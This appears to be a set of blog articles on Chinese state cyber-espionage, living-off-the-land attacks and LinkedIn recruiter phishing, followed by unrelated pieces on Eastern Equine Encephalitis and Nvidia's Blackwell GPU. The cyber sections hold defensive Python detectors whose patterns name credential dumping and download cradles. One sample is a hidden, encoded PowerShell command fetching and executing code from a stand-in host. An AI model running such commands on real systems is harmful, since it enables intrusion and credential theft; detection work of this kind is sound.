The latest in a long line of cyber offensives against the United States, codenamed “Salt Typhoon,” once again lays bare the persistent vulnerability of American infrastructure to foreign adversaries, this time attributed to China. These incursions are not isolated events but part of a calculated, multi-pronged campaign by advanced persistent threat (APT) groups whose names, such as Volt Typhoon, recur with chilling consistency (“Typhoon” is the suffix Microsoft assigns to actors it attributes to China). Each operation, designed to probe the fault lines of U.S. cybersecurity, highlights the expanding ambitions of these foreign actors.


In the Salt Typhoon incident, the specter of compromised systems looms large. The focus falls on internet service providers (ISPs), the backbone of American digital life, whose core networks were reportedly infiltrated. Investigators raised the possibility that core infrastructure, specifically Cisco Systems routers, was involved; Cisco has denied that its equipment was compromised in these attacks. Whatever the entry point, the strategic intent of such operations is unmistakable. An adversary with persistent access to carrier networks can intercept traffic, disrupt services, and surveil at will, which constitutes nothing less than a significant peril to national security.

Yet, as is often the case in the field of cyber warfare, the public remains woefully unaware of the depth and frequency of these intrusions. The U.S., it seems, is forever on the defensive, scrambling to patch vulnerabilities while its adversaries, undeterred, press on. Beijing’s vast cyber apparatus, ever stealthy and insidious, demonstrates an ability to penetrate America’s most vital systems without firing a single shot. The implications, like so many moments in history, may only become clear after the damage has been done.

Story By,
Skeeter Wesinger
9/26/24

If it sounds like a spy novel, then it might just be true. Living off the Land (LotL), the abuse of tools already present on a victim's systems rather than custom malware, has become the first weapon in the new Cold War, this time between the United States and the People’s Republic of China. This modern battlefield is fought not with tanks or missiles but through the subtle, insidious operations of cyber espionage. It is a war where the battlefield is the internet, and the combatants are not soldiers but bots: small, autonomous programs acting as the foot soldiers of nation-state-sponsored operations.

These bots infiltrate corporate networks with surgical precision, using disguised communications to siphon off critical data and metadata. Unlike overt attacks that trigger alarms and demand immediate responses, these bots slip under the radar, blending seamlessly into the everyday digital traffic of a company. Their presence is not felt, their actions not seen, often for long stretches of time—weeks, months, or even years—until the damage is done.

And the damage, when it finally becomes clear, is catastrophic. Intellectual property is stolen, financial systems are compromised, and sensitive data leaks into the hands of foreign adversaries. The consequences of these attacks stretch far beyond individual companies, threatening the security and economic stability of nations. This new cold war is not fought on the ground but in the unseen spaces of cyberspace, where vigilance is the only defense.

A bot, once embedded within a company’s systems, begins its covert mission. It is a malicious program with a singular purpose: to relay the company’s most guarded secrets to its unseen master. But its greatest weapon is not brute force or direct confrontation; it is stealth. These bots conceal their communication within the very lifeblood of corporate networks: normal, everyday traffic. Disguised as benign emails, mundane web requests, or encrypted sessions that mimic legitimate corporate exchanges, they send stolen information back to their operators without raising suspicion. What appears to be routine data passing through the system is, in fact, a betrayal unfolding in real time.

Their quarry is not just the obvious treasures—financial records, intellectual property, or proprietary designs. The bots are after something less tangible but no less valuable: metadata. The seemingly trivial details about the data—who sent it, when, from where—might appear inconsequential at first glance. But in the hands of a skilled adversary, metadata becomes a road map to the company’s inner workings. It reveals patterns, weaknesses, and, critically, the pathways to deeper infiltration.

For the corporation targeted by such an attack, the consequences are manifold. There is, of course, the potential loss of intellectual property—the crown jewels of any enterprise. Plans, designs, and trade secrets—each a piece of the company’s competitive edge—can be stolen and replicated by rivals. Financial information, once in the wrong hands, can result in fraud, a hemorrhage of funds that can cripple a company’s operations.

Perhaps the most dangerous aspect of these attacks is that compromised security extends beyond the initial theft. Once attackers have a firm grasp of a company’s systems through stolen metadata, they possess a detailed map of its vulnerabilities. They know where to strike next. And when they do, the company’s defenses, having already been breached once, may crumble further. What begins as a single act of theft quickly escalates into a full-scale infiltration.

And then, of course, there is the reputation damage. In the modern marketplace, trust is currency. When customers or clients discover their data has been stolen, they do not hesitate to seek alternatives. The collapse of faith in a company’s ability to safeguard its information can lead to long-term harm, far more difficult to recover from than the financial blow. The loss of reputation is a slow bleed, often fatal.

In short, these disguised communications are the perfect cover for botnet activities, allowing attackers to slip past defenses unnoticed. And when the theft is finally uncovered—if it is ever uncovered—it is often too late. The stolen data has already been transferred, the secrets already sold. The damage, irreversible.
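A beacon that hides inside ordinary HTTPS traffic is hard to spot by content, but it is often easy to spot by timing: a human browsing a site produces bursty, irregular connections, while a bot phoning home every N seconds with a little jitter produces gaps with a very low coefficient of variation. The Python below is an added example (it is not code from the original articles) that runs that check over constructed connection records; the record layout, host names and thresholds are assumptions, not anything the articles describe.

```python
"""Beaconing detector over constructed connection logs (added example).

Assumed input: (timestamp_seconds, src, dst, bytes) tuples such as a firewall,
proxy or NetFlow export would provide. All hosts and domains are placeholders.
"""
import random
from collections import defaultdict
from statistics import mean, pstdev


def inter_arrival_stats(timestamps):
    """Return (mean gap, coefficient of variation) for a list of timestamps."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 4:          # too few samples to say anything about regularity
        return None
    m = mean(gaps)
    if m == 0:
        return None
    return m, pstdev(gaps) / m


def find_beacons(records, min_connections=8, max_cv=0.25):
    """Flag (src, dst) pairs whose connection timing is too regular for a human.

    A low coefficient of variation (stdev / mean of the inter-arrival gaps)
    means the connections are evenly spaced, which is what a periodic C2
    check-in looks like even when each request is an innocuous-looking GET.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, _nbytes in records:
        by_pair[(src, dst)].append(ts)
    hits = []
    for (src, dst), ts in by_pair.items():
        if len(ts) < min_connections:
            continue
        stats = inter_arrival_stats(ts)
        if stats is None:
            continue
        period, cv = stats
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "period_s": round(period, 1),
                         "cv": round(cv, 3), "count": len(ts)})
    return sorted(hits, key=lambda h: h["cv"])


def constructed_sample():
    """Constructed data: one workstation beaconing every 60 s (+-3 s jitter)
    to an assumed C2 domain, and the same workstation browsing a news site
    at irregular human-like intervals."""
    rng = random.Random(7)
    records = []
    t = 0.0
    for _ in range(20):
        t += 60 + rng.uniform(-3, 3)
        records.append((t, "10.0.0.23", "cdn-update.example", 1400))
    t = 0.0
    for gap in [2, 180, 5, 900, 1, 3, 2400, 60, 7, 300, 4, 45]:
        t += gap
        records.append((t, "10.0.0.23", "news.example", 52000))
    return records


if __name__ == "__main__":
    for hit in find_beacons(constructed_sample()):
        print(hit)
```

In production the same logic runs per (source, destination) pair over a day of proxy or flow logs; the thresholds need tuning because software updaters and monitoring agents also beacon, so the output is a ranked list for an analyst rather than a verdict.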

I am reminded of a particular case, an incident that unfolded with a certain sense of inevitability. A seemingly reputable bank auditor, entrusted with sensitive client documents, calmly removed them from the premises one afternoon, claiming a simple lunch break. Upon returning, security, perhaps acting on an inkling of suspicion, inspected the bag. Inside, the documents—marked confidential—lay exposed. The auditor, caught red-handed, was promptly denied further access, and the documents seized. But, alas, the harm had already been done. Trust had been violated, and in that violation, the company learned a hard lesson: Never trust without verifying.

Such is the nature of modern-day espionage—not just a battle of information, but of vigilance. And in this game, those who are too trusting, too complacent, will find themselves outmatched, their vulnerabilities laid bare.


Story by Skeeter Wesinger

September 23, 2024

A large corporation with a well-funded cyber security team recently found out it had been hacked. Its opponents combined Living off the Land (LotL) techniques, fileless malware, legitimate credentials, and disguised communication, a mix that makes this kind of botnet activity very hard to detect, even for expert tiger teams. Without the right focus on behavioral analysis, memory forensics, and network monitoring, even highly skilled teams can miss the subtle signs of this form of attack.

If your teams are looking for traditional malware or malicious executables, they may not be monitoring the activities of legitimate tools. Attackers use those tools (PowerShell, WMI, remote management utilities, scheduled tasks) to camouflage their actions as normal system administration, so even if your tiger teams were watching system processes, the malicious use of these tools could easily go unnoticed.

One of the core advantages of LotL is the use of fileless techniques: the attackers often don’t drop detectable malware on the system’s disk. Instead, they execute code directly in memory or use scripting environments like PowerShell, leaving little or nothing that traditional malware-detection tools or disk-scanning endpoint security would recognize.

The teams may have been relying on disk-based or signature-based analysis, which is ineffective against fileless malware. By leaving no artifacts on disk, the attackers bypass traditional endpoint detection, which would have been the teams’ main focus.
Since most of the activity occurs in memory, uncovering it requires memory forensics plus telemetry that records what actually ran: PowerShell script block logging (Event ID 4104), AMSI integration, and process-creation auditing with command lines. If the tiger teams did not perform real-time memory analysis or collect that telemetry, they could miss the attack entirely.
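Fileless does not mean traceless: the script block and process command line still exist in the event log when logging is on. The following Python is an added example, not code from the original article, showing the kind of heuristic scoring a detection team would run over exported PowerShell command lines and script blocks. The sample entries, host names and the indicator list are assumptions constructed for the example.

```python
"""Heuristic scoring of PowerShell command lines / script blocks (added example).

Assumed input: dicts with the text recorded by Windows event logging
(Event ID 4688 command lines or 4104 script blocks). Samples are constructed.
"""
import base64
import math
import re
from collections import Counter

# Each pattern names a technique common in fileless / LotL tradecraft (assumed list).
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b)", re.I),
    "in_memory_exec": re.compile(r"(?:Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load|Invoke-ReflectivePEInjection)", re.I),
    "amsi_tamper": re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", re.I),
    "credential_access": re.compile(r"Invoke-Mimikatz|sekurlsa|\blsass\b", re.I),
    "hidden_window": re.compile(r"-(?:w|win|window|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I),
}


def shannon_entropy(s):
    """Bits per character; base64 blobs and obfuscated loaders score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_encoded_command(script):
    """Return the UTF-16LE payload behind -EncodedCommand, or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", script, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(script):
    """Score one entry; returns (score, [matched indicator names])."""
    text = script
    decoded = decode_encoded_command(script)
    if decoded:
        text = script + "\n" + decoded        # scan the decoded payload as well
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    score = 2 * len(hits)
    if len(script) > 200 and shannon_entropy(script) > 4.5:
        hits.append("high_entropy")          # long, dense one-liner: typical loader
        score += 2
    return score, hits


def triage(events, threshold=4):
    """Return (host, user, score, hits) for entries at or above the threshold."""
    out = []
    for e in events:
        score, hits = score_script_block(e["script"])
        if score >= threshold:
            out.append((e["host"], e["user"], score, hits))
    return out


# Constructed samples: an in-memory download cradle hidden behind -enc,
# a routine directory listing, and a legitimate internal download.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://cdn-update.example/a')"
MALICIOUS = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
BENIGN_LISTING = r"Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 10MB"
BENIGN_DOWNLOAD = r"Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\Temp\report.csv"
SAMPLE_EVENTS = [
    {"host": "WS-0231", "user": "jdoe", "script": MALICIOUS},
    {"host": "WS-0102", "user": "admin1", "script": BENIGN_LISTING},
    {"host": "WS-0102", "user": "admin1", "script": BENIGN_DOWNLOAD},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

The threshold matters: a single Invoke-WebRequest in an admin's script scores 2 and is left alone, while an encoded, hidden-window download cradle lights up four indicators at once. Decoding the -EncodedCommand argument before matching is the important step; without it the cradle is just an opaque base64 string.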

Story By Skeeter Wesinger

September 19, 2024

U.S. authorities said on Wednesday that the Flax Typhoon actor infiltrated networks by exploiting known vulnerabilities and then used existing system tools to steal data.
The bots bypassed traditional security solutions like antivirus and intrusion detection systems because those systems are designed to detect known malware signatures or unusual file activity.

The state-sponsored actor, in this case the PRC, therefore avoids dropping large or sophisticated malware packages, which would raise the odds of tripping those defenses, and relies instead on legitimate system tools, keeping detectable malware to a minimum and slipping past signature-based systems. After gaining initial access, the attackers dump user credentials from memory (typically the LSASS process) or from password stores, then use them to elevate privileges and move laterally across the network, reaching more sensitive systems and data.
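The dump-then-move sequence described above leaves a recognisable pair of traces when endpoint telemetry is collected: a process opening LSASS with memory-read access, followed shortly by network logons from that same host to other machines. The Python below is an added example, not code from the advisory or the article, that correlates the two. It assumes two constructed event streams shaped like Sysmon Event ID 10 (ProcessAccess) and Windows Security Event ID 4624 (logon), with access masks already parsed to integers and an assumed host-to-IP inventory; hosts, accounts and the allow-list are placeholders.

```python
"""Correlating an LSASS memory read with subsequent lateral logons (added example).

Assumed inputs: Sysmon Event ID 10 records (who opened a handle to lsass.exe,
with which GrantedAccess mask) and Security Event ID 4624 records (logons).
Everything below is constructed for the example.
"""
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010   # access right needed to read another process's memory

# Processes that legitimately open LSASS in this (assumed) environment.
ALLOWED_LSASS_READERS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

SYSMON_10 = [
    {"time": "2024-09-17T09:12:03", "host": "WS-0231",
     "source_image": r"C:\Windows\System32\svchost.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1000},
    {"time": "2024-09-17T10:41:55", "host": "WS-0231",
     "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1010},
]

SECURITY_4624 = [
    {"time": "2024-09-17T10:43:10", "host": "FS-01", "user": "svc_backup", "logon_type": 3, "src_ip": "10.0.0.23"},
    {"time": "2024-09-17T10:47:30", "host": "DC-01", "user": "svc_backup", "logon_type": 3, "src_ip": "10.0.0.23"},
    {"time": "2024-09-17T10:50:02", "host": "FS-02", "user": "jdoe", "logon_type": 3, "src_ip": "10.0.0.88"},
]

HOST_IP = {"WS-0231": "10.0.0.23"}   # assumed asset-inventory mapping


def parse(ts):
    return datetime.fromisoformat(ts)


def suspicious_lsass_access(events):
    """Sysmon 10 records where an unexpected process could read LSASS memory."""
    out = []
    for e in events:
        if not e["target_image"].lower().endswith(r"\lsass.exe"):
            continue
        if e["granted_access"] & PROCESS_VM_READ == 0:
            continue                                  # handle cannot read memory
        if e["source_image"].lower() in ALLOWED_LSASS_READERS:
            continue                                  # known-good system process
        out.append(e)
    return out


def correlate(sysmon10, sec4624, host_ip, window=timedelta(minutes=30)):
    """For each suspicious LSASS read, collect network (type 3) or RDP (type 10)
    logons that originate from the same host within `window` afterwards."""
    chains = []
    for access in suspicious_lsass_access(sysmon10):
        t0 = parse(access["time"])
        src_ip = host_ip.get(access["host"])
        follow = [l for l in sec4624
                  if l["src_ip"] == src_ip
                  and l["logon_type"] in (3, 10)
                  and t0 < parse(l["time"]) <= t0 + window]
        if follow:
            chains.append({"host": access["host"], "reader": access["source_image"],
                           "at": access["time"],
                           "logons": [(l["time"], l["user"], l["host"]) for l in follow]})
    return chains


if __name__ == "__main__":
    for chain in correlate(SYSMON_10, SECURITY_4624, HOST_IP):
        print(chain)
```

The first Sysmon record is svchost.exe with a mask that lacks PROCESS_VM_READ and is dropped twice over; the second is PowerShell with 0x1010 and is followed within minutes by svc_backup logons to a file server and a domain controller from the same workstation, which is exactly the chain an analyst wants surfaced as one alert rather than three unrelated events.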

Story By Skeeter Wesinger

September 19, 2024

Phishing attacks on LinkedIn are becoming increasingly sophisticated. State-sponsored actors are posing as recruiters from major headhunting firms like Korn Ferry, based in Los Angeles. These attackers aim to trick professionals into revealing sensitive information or downloading malware by creating profiles that closely resemble those of legitimate recruiters.

The process begins with attackers setting up fake LinkedIn profiles using stolen or fabricated information. A key red flag is the number of LinkedIn connections; if the profile has fewer than 10, it’s often a fake. These profiles frequently use company logos, professional headshots, and detailed job descriptions to appear credible. They may claim to represent well-known firms or major corporations like Google, Microsoft, or top-tier recruitment agencies to target professionals who aspire to work at such companies.

Once the profile is in place, the phishing attempt usually starts with a connection request or a direct message (InMail). The message will likely include a job offer or a unique career opportunity crafted to appeal to the recipient. The attacker might claim they’ve reviewed your profile and believe you are an excellent candidate for a prestigious, high-paying job—tactics often enhanced using AI to generate convincing content.

In the message, the fake recruiter may include a link, supposedly leading to a job portal, a document with more details, or a form to submit your CV. These links usually redirect to a malicious site designed to steal login credentials and personal information or to install malware. Always hover over a link to inspect it before clicking, and read the actual destination domain rather than the text shown. If the link looks suspicious, reconsider engaging.

Some of the most sophisticated attackers even create fake LinkedIn login pages or corporate websites to capture your username and password. It’s critical never to reuse passwords, as a single captured password could expose other accounts, and to protect your accounts with multi-factor authentication. Additionally, they might request personal information such as your phone number, home address, or social security number under the pretense of a job application.

Remember, these attackers are not amateurs—they are state-sponsored actors. Be vigilant and cautious when interacting with unsolicited job offers on LinkedIn. Always verify the legitimacy of any recruiter before providing any information, and stay aware of the signs that an offer may be too good to be true.
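The "hover and inspect" advice above comes down to a handful of checks that can be written out precisely. The Python below is an added example (not code from the original article) that applies them to the URL behind a recruiter's link: the brand name used as a subdomain of an unrelated domain, look-alike spellings, display text that disagrees with the real destination, a non-HTTPS scheme, and login-style paths. The organisation's known domains, the confusable-character table and all sample URLs are assumptions constructed for the example.

```python
"""Inspecting a link before clicking it (added example, not from the article).

Assumed: KNOWN_GOOD lists the registrable domains the claimed organisation
really uses. All sample domains below are placeholders under .example/.test.
"""
import unicodedata
from urllib.parse import urlsplit

KNOWN_GOOD = ("linkedin.com", "kornferry.com")   # assumed for this example

# Minimal confusable table; substitutions attackers use for Latin letters.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "vv": "w", "rn": "m",
               "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c"}

CREDENTIAL_WORDS = ("login", "signin", "verify", "password")


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Use the Public Suffix List in real code."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def skeleton(label):
    """Collapse look-alike spellings onto the plain Latin form."""
    s = unicodedata.normalize("NFKC", label.lower())
    for bad, good in CONFUSABLES.items():
        s = s.replace(bad, good)
    return s.replace("-", "")


def inspect_link(href, display_text=None):
    """Return a list of human-readable findings; an empty list means no red flags."""
    findings = []
    parts = urlsplit(href.strip())
    host = parts.hostname or ""
    if parts.scheme != "https":
        findings.append(f"scheme is {parts.scheme or 'missing'}, not https")
    if host.startswith("xn--") or any(ord(c) > 127 for c in host):
        findings.append("internationalised (punycode/non-ASCII) hostname")
    reg = registrable_domain(host)
    if reg not in KNOWN_GOOD:
        for good in KNOWN_GOOD:
            brand = good.split(".")[0]
            # linkedin.com.careers-portal.example: brand left of the real domain
            if brand in host.lower().split(".")[:-2]:
                findings.append(f"'{brand}' appears as a subdomain of {reg}")
            # 1inkedin.com, linked-in.com: look-alike registrable domain
            if skeleton(reg.split(".")[0]) == skeleton(brand):
                findings.append(f"{reg} is a look-alike of {good}")
        if not any("look-alike" in f or "subdomain" in f for f in findings):
            findings.append(f"destination {reg} is not a known domain for this organisation")
    if display_text:
        shown = urlsplit(display_text if "://" in display_text else "https://" + display_text)
        if shown.hostname and registrable_domain(shown.hostname) != reg:
            findings.append(f"link text shows {shown.hostname} but points to {host}")
    if any(word in parts.path.lower() for word in CREDENTIAL_WORDS):
        findings.append("path looks like a credential prompt")
    return findings


if __name__ == "__main__":
    for href, text in [
        ("https://www.linkedin.com/jobs/view/12345", None),
        ("https://1inkedin.com/login", None),
        ("http://linkedin.com.careers-portal.example/verify", "https://www.linkedin.com/jobs"),
    ]:
        print(href, "->", inspect_link(href, text) or "no red flags")
```

The registrable-domain check is the one that matters most: everything to the left of it is under the attacker's control, so a hostname that starts with the brand name proves nothing. A production version would replace the two-label heuristic with the Public Suffix List and the small confusable table with the Unicode confusables data.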


Article by Skeeter Wesinger

September 16, 2024


https://www.linkedin.com/pulse/phishing-attacks-linkedin-skeeter-wesinger-5newe

The town of Concord, Massachusetts, announced that they would spray two popular locations with pesticides on Thursday after mosquito sampling confirmed the presence of Eastern Equine Encephalitis (EEE). These locations were Emerson Field at 90 Stow Street and Rideout Playground at 61 Laws Brook Road. Treatment was scheduled for after dusk.
There is currently no specific cure or antiviral treatment for EEE. Treatment is primarily supportive care, which focuses on managing symptoms and complications while the body fights off the infection. Eastern Equine Encephalitis is not a disease to be trifled with: the most severe cases require hospitalization, particularly when neurological symptoms like seizures, confusion, or coma occur, and patients may need to be admitted to an intensive care unit (ICU) for close monitoring and management of complications.

EEE transmission is typically seasonal, occurring most frequently when mosquitoes are active from late spring through early fall. In warmer climates the transmission season may extend longer. In areas where the virus is present, outbreaks can occur periodically when mosquito populations are high.


Like humans, horses can become infected with EEE after being bitten by an infected mosquito. The disease can be severe and often fatal in horses, leading to neurologic symptoms such as instability, head pressing, or seizures.
Other mammals, such as deer or dogs, may occasionally be infected, though they are not primary targets of the virus.
EEE does not spread from person to person. According to the CDC, the virus cannot be transmitted through casual contact, respiratory droplets, or bodily fluids; the bite of an infected mosquito is the only known natural route. The one documented exception is organ transplantation: in a single reported case, an infected organ donor transmitted the virus to three organ recipients.
Humans and other mammals, such as horses, are dead-end hosts for EEE, meaning that they can become infected by the virus through a mosquito bite but do not spread the virus further.
The EEE virus is spread mainly by mosquitoes that breed in freshwater hardwood swamps. The virus is maintained among birds by Culiseta melanura, which feeds almost exclusively on birds and rarely bites people.
Transmission to humans and horses occurs mostly through Aedes, Coquillettidia, and Culex species, which bite both birds and mammals and therefore act as “bridge” vectors between the bird and mammal populations.
Antibody (ELISA) testing for EEE can mislead in three ways. Early in infection, the body may not yet have produced enough detectable IgM or IgG antibodies; in the acute phase it can take several days to a week for antibody levels to become detectable, so a test performed too early may be falsely negative.
Later, as the acute phase ends, IgM antibody levels fall, so a test that is delayed too long can also read negative.
Finally, ELISA tests may produce false positives or inconclusive results through cross-reactivity with antibodies against other arboviruses (e.g., West Nile virus, Zika virus, or dengue). This is a greater problem in regions where several mosquito-borne viruses circulate and antibodies raised against one virus react with antigens from another. If you develop symptoms such as fever, headache, confusion, or seizures after mosquito exposure, contact your physician.

Story By Skeeter Wesinger

In a related case, Joe Casey of Kensington, New Hampshire, about five miles north of Amesbury, Massachusetts, tested positive for eastern equine encephalitis (EEE), West Nile virus, and St. Louis encephalitis. Casey has been hospitalized for several weeks with an illness affecting his brain and nervous system, while doctors struggle to determine which virus is causing his debilitating symptoms.

https://www.cbsnews.com/boston/news/eee-map-massachusetts-towns-mosquitoes/

https://www.cdc.gov/eastern-equine-encephalitis/cause-and-spread/index.html

https://www.linkedin.com/pulse/eastern-equine-encephalitis-skeeter-wesinger-gfyyc

Nvidia Blackwell GPU

Nvidia expects to be delivering the Blackwell GPU by the end of 2024

In 2022, the first details of Nvidia’s (pronounced NUH-vid-ee-uh) Blackwell GPU were leaked, hinting at the company’s next leap in generative AI performance. Early users who have tested the new product report that these GPUs are incredibly fast, so fast that they outpace even the quickest networks currently available. Nvidia has claimed that in recent AI benchmarks the Blackwell GPU delivers up to a 30x performance boost and a 25x improvement in efficiency compared to its predecessor. The company anticipates beginning product shipments by the end of 2024.

It’s also worth noting that in June 2024, Nvidia hinted at a successor to the Blackwell GPU—codenamed Rubin. During his keynote address at Computex, Nvidia CEO Jensen Huang revealed that the next generation of GPUs and CPUs, named “Rubin” in honor of the American astronomer Vera Rubin, is expected to be available in the first half of 2026. If this product reaches the market as planned, it could potentially challenge the limits of Moore’s Law. The Blackwell-architecture GPUs already push boundaries with their 208 billion transistors, built using TSMC’s custom 4NP process.

While Moore’s Law, which predicts the doubling of transistors on a chip approximately every two years, might be approaching its physical limitations, the drive for technological innovation remains strong. The semiconductor industry is shifting towards new chip architectures, quantum computing, and AI and machine learning advancements. The ongoing debate between Nvidia’s Jensen Huang and Intel’s Pat Gelsinger highlights differing views on the future of technological progress. However, innovation in computing will persist, albeit in new and evolving forms.

The Blackwell GPU is engineered with a cutting-edge design that features two dies connected by a 10 TB/s (terabyte per second) interconnect, effectively creating a single two-die GPU. This architecture enables unprecedented performance and efficiency.

Central to this innovation is the GB200 Superchip, which integrates two Blackwell GPUs alongside an Nvidia Grace CPU optimized for peak performance. A GB200 Superchip can carry up to 384 GB of high-bandwidth memory 3e (HBM3e) in the GPU packages, delivering an aggregate memory bandwidth of up to 16 TB/s. Like previous HBM generations, HBM3e uses 3D stacking, where memory dies are stacked vertically and connected through TSVs (through-silicon vias). This compact design reduces the physical footprint of the memory and allows faster data transfer between layers.

Moreover, multiple GB200 Superchips can be interconnected in clusters using Nvidia’s latest Quantum-X800 InfiniBand and Spectrum-X800 Ethernet platforms, which provide 800 Gb/s per port. This networking capability further enhances the scalability and performance potential of the Blackwell architecture, making it a powerful tool for the most demanding AI and computing workloads.

The Blackwell chip’s two dies, fused into a single GPU by the 10 TB/s interconnect, initially produced lower-than-expected manufacturing yields. According to Nvidia, it has changed the Blackwell GPU die mask to improve production yields.

The AI revolution will be comparable to the Industrial or Digital Revolutions, with far-reaching consequences for humanity. The outcomes of the AI revolution will depend on how society chooses to develop and implement AI technology, as this revolution isn’t going to end anytime soon. As both PwC and McKinsey say, AI presents a multi-trillion-dollar opportunity.


Story by Skeeter Wesinger

https://www.linkedin.com/pulse/nvidia-blackwell-gpu-skeeter-wesinger-opnee